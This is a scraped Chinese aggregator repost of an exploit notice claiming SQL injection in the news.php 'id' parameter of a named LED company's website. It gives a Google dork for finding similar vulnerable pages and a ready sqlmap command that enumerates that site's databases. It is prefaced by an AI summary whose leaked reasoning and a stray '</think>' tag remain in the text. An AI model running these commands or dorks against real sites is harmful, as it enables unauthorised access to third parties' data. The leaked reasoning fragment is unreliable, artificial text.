cr-led - SQL Injection
嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。我得先仔细阅读文章内容。看起来这篇文章是关于SQL注入漏洞的,标题是“cr-led - SQL Injection”。作者是javad rashidi,日期是2025年12月1日。
风险等级是中等,本地攻击不行,远程可以。CVE和CWE都没有编号。Dork是inurl:"news.php?id=",这可能是一个用于搜索易受攻击页面的Google Dork。
文章里还提到了使用sqlmap来测试漏洞,命令是sqlmap -u "https://www.cr-led.com/news.php?id=4" --dbs。这说明可以通过这个链接来检测数据库。
还有投票部分,50%支持,50%反对。评论部分需要填写必填字段,但有提示信息说评论会被隔离48小时。
总结的时候要包括漏洞类型、影响范围、测试方法以及相关的工具和Dork。同时要注意字数限制,确保在100字以内,并且直接描述内容,不需要额外的开头语。
</think>
文章描述了一个SQL注入漏洞存在于cr-led网站的news.php页面中,该漏洞可通过URL参数id触发,并支持远程攻击。利用sqlmap工具可进一步测试和利用该漏洞。
2025-12-1 16:54:10
Author: cxsecurity.com(查看原文)
阅读量:3
收藏
"cr-led - SQL Injection"
# Exploit Title: cr-led - SQL Injection
# Date: 11-13-2025
# Exploit Author: javad rashidi
# Tested on: Win,Linux
# Google Dork: inurl:"news.php?id="
Sqlmap:
sqlmap -u "https://www.cr-led.com/news.php?id=4" --dbs
Thanks for you comment! Your message is in quarantine 48 hours.
| {{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
|
|
文章来源: https://cxsecurity.com/issue/WLB-2025120003
如有侵权请联系:admin#unsafe.sh